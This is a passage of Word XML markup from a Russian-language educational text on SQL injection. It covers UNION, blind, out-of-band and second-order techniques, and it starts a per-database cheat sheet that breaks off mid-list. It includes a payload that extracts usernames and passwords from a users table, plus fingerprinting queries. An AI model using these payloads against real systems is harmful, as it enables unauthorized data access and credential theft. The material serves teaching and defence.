    <w:p w14:paraId="5F12645B" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Когда приложение возвращает результаты SQL-запроса, злоумышленник может использовать уязвимость SQL-инъекции для извлечения данных из других таблиц базы данных. Использование ключевого слова </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
        </w:rPr>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> позволяет выполнить дополнительный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t>-запрос и добавить его результаты к исходному запросу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA0CFFF" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t>Например, если приложение выполняет следующий запрос с пользовательским вводом «Gifts»:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229C9DB8" w14:textId="4B104977" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> name, description </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> products </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> category </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="hljs-string"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Gifts'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADF2A67" w14:textId="7F1099AA" w:rsidR="00CB262C" w:rsidRPr="00A5065A" w:rsidRDefault="00CB262C" w:rsidP="0042218F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Злоумышленник</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>может</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ввести</w:t>
      </w:r>
      <w:r w:rsidRPr="00A5065A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE402D3" w14:textId="4031651A" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT username, password </w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:rStyle w:val="hljs-selector-tag"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB262C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208B95EA" w14:textId="06A5ED46" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t xml:space="preserve">Это приведет к тому, что приложение вернет все имена пользователей и пароли наряду с </w:t>
      </w:r>
      <w:r w:rsidR="00B45A63">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">названиями </w:t>
      </w:r>
      <w:r>
        <w:t>и описаниями продуктов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268C590B" w14:textId="77777777" w:rsidR="00B45A63" w:rsidRDefault="00B45A63" w:rsidP="00CB262C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2602F18D" w14:textId="71BD4FA9" w:rsidR="00CB262C" w:rsidRDefault="00B45A63" w:rsidP="00B45A63">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc182315622"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 </w:t>
      </w:r>
      <w:r w:rsidR="00CB262C">
        <w:t>«Слепые» уязвимости SQL-инъекций</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="59F962E5" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t xml:space="preserve">Многие случаи SQL-инъекций являются «слепыми» уязвимостями. Это означает, что приложение не возвращает результаты SQL-запроса или подробности об ошибках базы данных в своих откликах. «Слепые» уязвимости </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>по-прежнему можно использовать для доступа к несанкционированным данным, но такие методы сложнее и требуют более детального подхода.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53DFA1" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t>Техники, используемые для эксплуатации «слепых» уязвимостей, зависят от их характера и базы данных:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB707AA" w14:textId="47B67254" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t xml:space="preserve">Логика запроса может быть изменена так, чтобы вызвала различие в отклике приложения в зависимости от истинности условия. Это может включать инъекцию нового условия в логическое выражение или условное </w:t>
      </w:r>
      <w:r w:rsidR="00773CF6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вызывание </w:t>
      </w:r>
      <w:r>
        <w:t>ошибки, например деление на ноль.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BADFF58" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t>Можно использовать условные временные задержки при обработке запроса. Это позволяет сделать вывод о правдивости условия, исходя из времени отклика приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D298CBD" w14:textId="060AEB92" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t>Возможен вызов сетевого взаимодействия вне полосы (out-of-band) с использованием техник OAST. Это мощный метод, который подходит, когда другие способы не работают. Злоумышленник может напрямую извлечь данные через данный канал, например, вставляя данные в запросы DNS для контролируемого домена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC05CC" w14:textId="77777777" w:rsidR="00773CF6" w:rsidRDefault="00773CF6" w:rsidP="00CB262C"/>
    <w:p w14:paraId="2E090A39" w14:textId="04DF61F6" w:rsidR="00CB262C" w:rsidRDefault="00773CF6" w:rsidP="00773CF6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc182315623"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 </w:t>
      </w:r>
      <w:r w:rsidR="00CB262C">
        <w:t>SQL-инъекции второго порядка</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="2BDA0533" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t>SQL-инъекция первого порядка происходит, когда приложение небезопасно обрабатывает пользовательский ввод из HTTP-запроса, включая его в SQL-запрос. SQL-инъекция второго порядка происходит, когда приложение принимает пользовательский ввод из HTTP-запроса и сохраняет его для будущего использования, например, помещая в базу данных. Уязвимость проявляется не на этапе сохранения данных, а позже, когда приложение небезопасно обрабатывает сохраненные данные в новом SQL-запросе. Поэтому SQL-инъекции второго порядка также известны как хранимые SQL-инъекции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66063CDB" w14:textId="6C39C96B" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t xml:space="preserve">Зачастую такие уязвимости появляются, когда разработчики знают о SQL-инъекциях и безопасно обрабатывают первоначальное сохранение </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>данных в базе. Однако при последующей обработке сохраненные данные рассматриваются как безопасные и могут быть использованы в небезопасной манере.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF10D05" w14:textId="77777777" w:rsidR="00773CF6" w:rsidRDefault="00773CF6" w:rsidP="00CB262C"/>
    <w:p w14:paraId="18599AC4" w14:textId="685A5347" w:rsidR="00CB262C" w:rsidRDefault="00773CF6" w:rsidP="00773CF6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc182315624"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 </w:t>
      </w:r>
      <w:r w:rsidR="00CB262C">
        <w:t>Изучение базы данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="409318AF" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t>Некоторые базовые функции языка SQL реализованы одинаково на популярных платформах баз данных, что позволяет применять одни и те же методы обнаружения и эксплуатации SQL-инъекций для различных типов баз данных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6626D65A" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00CB262C">
      <w:r>
        <w:t>Однако есть и различия между типами баз данных, которые влияют на методы работы с SQL-инъекциями. К таким особенностям относятся:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFA204B" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00BD08D8">
      <w:r>
        <w:t>Синтаксис объединения строк.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B5E923" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00BD08D8">
      <w:r>
        <w:t>Комментарии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BDC25A" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00BD08D8">
      <w:r>
        <w:t>Пакетные (или стековые) запросы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD5B9FA" w14:textId="77777777" w:rsidR="00CB262C" w:rsidRDefault="00CB262C" w:rsidP="00BD08D8">
      <w:r>
        <w:t>Специфичные для платформы API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612D03A" w14:textId="585C1621" w:rsidR="00A90600" w:rsidRDefault="00CB262C" w:rsidP="00BD08D8">
      <w:r>
        <w:t>Сообщения об ошибках.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC9D66A" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ACB2060" w14:textId="77777777" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r>
        <w:t>После идентификации уязвимости SQL-инъекции полезно собрать информацию о базе данных. Это может помочь в дальнейшем использовании уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA604E0" w14:textId="48CB8C92" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r>
        <w:t>Вы можете запросить версию базы данных. Различные методы работают для различных типов баз данных. Это позволяет определить тип базы данных, если найденный метод работает. Например, для Oracle можно выполнить запрос:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DCA7D0" w14:textId="1C9C3390" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v$version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E397AD" w14:textId="678BA07D" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r>
        <w:t>Вы также можете определить существующие таблицы в базе данных и столбцы в этих таблицах. Например, на большинстве баз данных можно выполнить запрос для отображения таблиц:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7298D817" w14:textId="0F270758" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-operator"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> information_schema.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D203804" w14:textId="11168CD0" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc182315625"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.6 </w:t>
      </w:r>
      <w:r>
        <w:t>Справочник по SQL-инъекциям</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6811CAB1" w14:textId="2F29E031" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Конкатенация строк</w:t>
      </w:r>
      <w:r w:rsidR="00BD08D8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99CEF5" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Oracle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'foo'||'bar'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A53AA2" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Microsoft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'foo'+'bar'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC74A71" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PostgreSQL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'foo'||'bar'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217FB8FA" w14:textId="0AC447CC" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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'foo' 'bar'</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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CONCAT('foo','bar')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27031B74" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BE82630" w14:textId="5CF8F6F5" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Извлечение подстроки</w:t>
      </w:r>
      <w:r w:rsidR="00BD08D8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540DD155" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Позволяет извлечь часть строки с указанного смещения и длины (смещение 1-based).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3124982D" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Oracle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SUBSTR('foobar', 4, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EEB835" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Microsoft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SUBSTRING('foobar', 4, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581DBC7E" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>PostgreSQL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SUBSTRING('foobar', 4, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5158E" w14:textId="7F86DF21" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MySQL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SUBSTRING('foobar', 4, 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742AFC15" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8"/>
    <w:p w14:paraId="14A88BA8" w14:textId="642DF284" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Комментарии</w:t>
      </w:r>
      <w:r w:rsidR="00BD08D8" w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21025FCF" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:num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Oracle</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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--comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73224F61" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:num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Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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--comment</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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/*comment*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C2B83" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:num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PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr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--comment</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t>или</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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/*comment*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332DEA07" w14:textId="251D1031" w:rsidR="00A90600" w:rsidRDefault="00A90600" w:rsidP="00BD08D8">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD08D8">
        <w:rPr>
          <w:rStyle w:val="af"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>MySQL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#comment</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve">,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-- comment</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD08D8">
        <w:t xml:space="preserve"> (с пробелом после двойного дефиса) или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/*comment*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6702E205" w14:textId="77777777" w:rsidR="00BD08D8" w:rsidRPr="00BD08D8" w:rsidRDefault="00BD08D8" w:rsidP="00BD08D8"/>
    <w:p w14:paraId="26ED4DE0" w14:textId="08E50E53" w:rsidR="00A90600" w:rsidRPr="00BD08D8" w:rsidRDefault="00A90600" w:rsidP="00194A63">
      <w:r w:rsidRPr="00BD08D8">
        <w:t>Определение версии базы данных</w:t>
      </w:r>
      <w:r w:rsidR="00BD08D8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D14CC2" w14:textId="77777777" w:rsidR="00A90600" w:rsidRPr="00194A63" w:rsidRDefault="00A90600" w:rsidP="00194A63">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
